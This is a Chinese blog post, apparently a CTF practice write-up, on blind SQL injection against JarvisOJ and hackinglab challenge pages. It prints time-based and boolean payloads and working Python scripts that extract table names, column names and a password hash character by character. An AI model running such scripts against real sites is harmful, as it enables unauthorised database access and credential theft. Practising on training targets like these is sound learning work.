2. 程式人生 > >SQL注入篇 盲注總彙

SQL注入篇 盲注總彙

阿新 發佈:2019-02-19

最近看了一些盲注習題,在這裡想總結一下吧。

盲注其實可以代替任何注入,但基本的注入比盲注簡單。在這裡我先解析幾道盲注的習題。

1. JSOJ的題目

這裡寫圖片描述
發現了sql盲注漏洞 並且是sleep注入
2. 利用給出的payload初步嘗試

/*'XOR(if(1,sleep(2),0))OR'*/
確實有延遲效果,那麼下面就是寫程式碼了

這裡寫圖片描述
3. 利用sleep延遲注入,編寫python指令碼
首先得到資料表名(注意有空格過濾)

首先得到資料表名(注意有空格過濾)
利用此程式碼爆破資料表名

# by zy
# 10.15.2016
import requests
url=r'http://web.jarvisoj.com:32787/login.php'
 

string=''
dic='0123456789abcdefghijklmnopqrstuvwxyz'
for i in range(1,33):
    for j in dic:
        id="/*'XOR(if(ord((select/**/substr(table_name,{0},1)/**/from/**/information_schema.tables/*!where*/table_schema=database()))={1},sleep(3),0))OR'*/".format(str(i),ord(j))
        data={
            'username':id,
            'password'
 
: 1
        }
        print j
        s=requests.post(url=url,data=data)
        sec=s.elapsed.seconds
        if sec > 2:
            string+=j
            break
    print string
接著要利用此程式碼爆破 欄位名稱
# by zy
# 10.15.2016
import requests
url=r'http://web.jarvisoj.com:32787/login.php'
string=''
dic='0123456789abcdefghijklmnopqrstuvwxyz'
 

for i in range(1,33):
    for j in dic:
        id="/*'XOR(if(ord((select/**/substr(group_concat(column_name),{0},1)/**/from/**/information_schema.columns/*!where*/table_name='admin'/**/limit/**/1))={1},sleep(3),0))OR'*/".format(str(i),ord(j))
        data={
            'username':id,
            'password': 1
        }
        print j
        s=requests.post(url=url,data=data)
        sec=s.elapsed.seconds
        if sec > 2:
            string+=j
            break
    print string

這裡寫圖片描述

利用上面爆出來的欄位名稱爆欄位內容
將/*'XOR(if(1,sleep(ord(substr(password,{0},1))-47),0))OR'*/作為payload

程式碼如下
# by zy
# 10.15.2016
import requests
url=r'http://web.jarvisoj.com:32787/login.php'
string=''
for i in range(1,5):
    id="/*'XOR(if(1,sleep(ord(substr(username,{0},1))-97),0))OR'*/".format(str(i))
    data={
        'username':id,
        'password': 1
    }
    s=requests.post(url=url,data=data)
    sec=s.elapsed.seconds
    string+=chr(97+int(sec))
    print string
結果為admin
再替換payload變為
/*'XOR(if(1,sleep(ord(substr(password,{0},1))-47),0))OR'*/
就可以爆出密碼了
爆出的密碼為334cfb59c9d74849801d5acdcfdaadc3
或者利用以下程式碼進行暴庫也可以
# by zy
# 10.15.2016
import requests
url=r'http://web.jarvisoj.com:32787/login.php'
string=''
dic='0123456789abcdefghijklmnopqrstuvwxyz'
for i in range(1,33):
    for j in dic:
        id="/*'XOR(if(ord(substr(password,{0},1))>{1},sleep(3),0))OR'*/".format(str(i),ord(j))
        data={
            'username':id,
            'password': 1
        }
        s=requests.post(url=url,data=data)
        sec=s.elapsed.seconds

        if sec < 2:
            string+=j
            break
    print string

2.hackinglab題目

注入關 2
這道題我把他強行轉化為盲注的題目來練手^_^.首先找到盲注的條件

id=1 and 1=2時
文段中沒有顯示任何東西
當id=1時
文段中有顯示
滿足盲注條件
爆資料表



import requests
cookies={
        'PHPSESSID': '944d46747cd9059f63dc2e103b2fe31a'
}

dic='3_abcdefghijklmnopqrstuvwxyz'
string = ''
for i in range(1,33):
    for j in dic:
        url='http://lab1.xseclab.com/sqli3_6590b07a0a39c8c27932b92b0e151456/index.php?id=1 and ord((select substr(table_name,{0},1) from information_schema.tables where table_schema=database())) = {1}'.format(str(i),ord(j))
        s=requests.get(url=url , cookies=cookies)
        content=s.content
        length=len(content)
        print length
        if length > 400 :
            string+=j
            break
    print string

這裡寫圖片描述

爆欄位名稱

import requests
cookies={
        'PHPSESSID': '944d46747cd9059f63dc2e103b2fe31a'
}

dic='3_abcdefghijklmnopqrstuvwxyz'
string = ''
for i in range(1,33):
    for j in dic:
        url='http://lab1.xseclab.com/sqli3_6590b07a0a39c8c27932b92b0e151456/index.php?id=1 and ord((select substr(group_concat(column_name),{0},1) from information_schema.columns where table_name="sae_user_sqli3")) = {1}'.format(str(i),ord(j))
        s=requests.get(url=url , cookies=cookies)
        content=s.content
        length=len(content)
        print length
        if length > 400 :
            string+=j
            break
    print string 

idtitlecontent

相關推薦

SQL注入 總彙

最近看了一些盲注習題,在這裡想總結一下吧。 盲注其實可以代替任何注入,但基本的注入比盲注簡單。在這裡我先解析幾道盲注的習題。 1. JSOJ的題目 發現了sql盲注漏洞 並且是slee

SQL注入優化

SQL注入之盲注優化技術 典型時間型盲注示例程式碼: <?php header('content-type:text/html;charset=utf-8'); @$id=$_GET['id']; //傳參 if(!isset($id)){

sqli-labs—————Sql注入講解

盲注何為盲注?盲注就是在sql注入過程中,sql語句執行的選擇後,選擇的資料不能回顯到前端頁面。此時,我們需要利用一些方法進行判斷或者嘗試,這個過程稱之為盲注。盲注分為三類•基於布林SQL盲注•基於時間的SQL盲注•基於報錯的SQL盲注1、基於布林SQL盲注————構造邏輯判

sql注入2

一、前言   上一篇:sql注入篇1 二、基於回顯的注入型別判斷   1、有結果的注入     例如下圖: (sqlllab less-1)可以看到有正常結果返回,對於的利用方式就是老套路了,先order by查詢出當前語句查詢的列數,在使用union查詢一一爆資料,當然,也可以使用指令碼直接脫

SQL注入 報錯注入

第一類 group by 與 floor rand 函式的報錯 payload (select count(*) from (select 1 union select 2 union selec

Java審計之SQL注入

# Java審計之SQL注入篇 ## 0x00 前言 本篇文章作為Java Web 審計的一個入門文,也是我的第一篇審計文,後面打算更新一個小系列,來記錄一下我的審計學習的成長。 ## 0x01 JDBC 注入分析 在Java裡面常見的資料庫連線方式也就那麼幾個,分別是JDBC,Mybatis,和H

sql注入基於布林/時間的詳解

                本來想自己總結寫一篇的,發現有篇寫的很好,轉載mark一個~原文連結:http://www.jb51.net/article/93445.htm基於布林的盲注Web的頁面的僅僅會返回True和False。那麼布林盲注就是進行SQL注入之後然後根據頁面返回的True或者是Fals

SQL注入技巧拓展】————5、MySQL淺析

前言 所有的測試均為無WAF的情況下進行。 註釋關鍵字 -- # 單行註釋,兩個-連線符後面緊跟著一個空格 # # 單行註釋 /**/ # 多行註釋 實踐效果: mysql> SELECT username,password FR

Sql與普通注入的區別

          在學習sql注入的時候,好多同學都是不弄清楚原理,去瀏覽器上狂搜一下注入語句,就開始對老師給的靶機注入,雖然能注入成功,但是不清楚原理,對以後的學習和工作沒有多大的好處。現在我就講一下sql盲注與普通注入的區別! (adsbygoogle = window.ads

SQL注入筆記03:攻擊

普通聯合注入和盲注的區別 普通注入:效率高,相容性差 盲注:效率低,相容性強 工具採用的基本都為盲注及其他注入 ********************************************************基於時間延遲的盲注攻擊:***********

CTF中幾種通用的sql手法和注入的一些tips

0x00 前言 在ctf比賽中難免會遇到一些比較有(keng)趣(die)的注入題,需要我們一步步的繞過waf和過濾規則,這種情況下大多數的注入方法都是盲注。然而在盲注過程中由於這些過濾規則不太好繞過,這時候就會無從下手,下面分享一下自己在比賽中總結幾種比較通用的盲注手

SQL SQL 注入、跨站點指令碼編制可能解決方案

跨站       3.點指令碼編制 詳細資訊 有多種減輕威脅的技巧: [1] 策略:庫或框架 使用不允許此弱點出現的經過稽核的庫或框架,或提供更容易避免此弱點的構造。 可用於更輕鬆生成正確編碼的輸出的庫和框架示例包括 Microsoft 的 Anti-XSS 庫、OWA

SQL注入——布林型

盲注是注入的一種,指的是在不知道資料庫返回值的情況下對資料中的內容進行猜測,實施SQL注入。盲注一般分為布林盲注和基於時間的盲注和報錯的盲注。本次主要講解的是基於布林的盲注。 Length()函式 返回字串的長度 Substr()擷取字串 Ascii()返回字元的ascii

Sql注入系列詳解(一)---基於時間差的

Sql 基於時間的盲注 基於的原理是,當對資料庫進行查詢操作,如果查詢的條件不存在,語句執行的時間便是0.但往往語句執行的速度非常快,執行緒資訊一閃而過,得到的執行時間基本為0. 例如: 於是sleep(N)這個語句在這種情況下起到了非常大的作用。  Select s

第九屆極客大挑戰——Geek Chatroom(sql

引言:因為太想加入三葉草了,所以極客大挑戰這段時間一直在努力的學習,原來還真沒想到能在比賽中拿到排行榜第一的成績,不過現在看來努力始終都是有回報的。但我依然還是比較菜啊-.-,最近卻有很多夥伴加我好友,一來就叫我大佬,讓我深感有愧-.-,既然都想看我wp,那我就挑幾道題寫寫好了,口拙詞劣還望見諒。

SQL基於時間的(BUGKUCTF)

這篇只是為了讓我自己做個記錄 在進行一個BUGKU的ctf:http://123.206.87.240:8002/web15/ 題目給出了原始碼: error_reporting(0); function getIp(){ $ip = ''; if(isset($_SERVER['

SQL(1)

簡介 Web應用訪問資料庫的目的有很多。常見目的就是訪問資料並呈現給使用者。在這種情況下,攻擊者就有可能會修改SQL語句並顯示資料庫中的任意資訊,並將這些資訊寫入到Web伺服器對HTTP請求的響應之中。有時不顯示資料庫的資訊,但並不表示程式碼不會受到SQL注入攻擊。 列如,使用者輸入任意使用者名稱及密碼時

SQL(2)

時間延遲 測試SQL注入漏洞時,會發現某一潛在漏洞難以確定,主要原因是Web應用沒有顯示任何錯誤,因而無法檢索任何資料。這種情況下,可以考慮向資料庫注入時間延遲。MSSQL伺服器有一條內建命令waitfor delay 'hours:minutes:seconds' http://127.0.0.1

sql 之利用regexp得到庫名,表名,列名

我們都已經知道,在MYSQL 5+中 information_schema庫中儲存了所有的 庫名,表明以及欄位名資訊。故攻擊方式如下: 1. 判斷第一個表名的第一個字元是否是a-z中的字元,其中blind_sqli是假設已知的庫名。 注:正則表示式中 ^[a-z] 表示字

sql學習

information_schema.schemata(schema_name) information_schema.tables(table_name,table_schema) information_schema.columns(column_name,table_name) 盲注與poc編寫:ht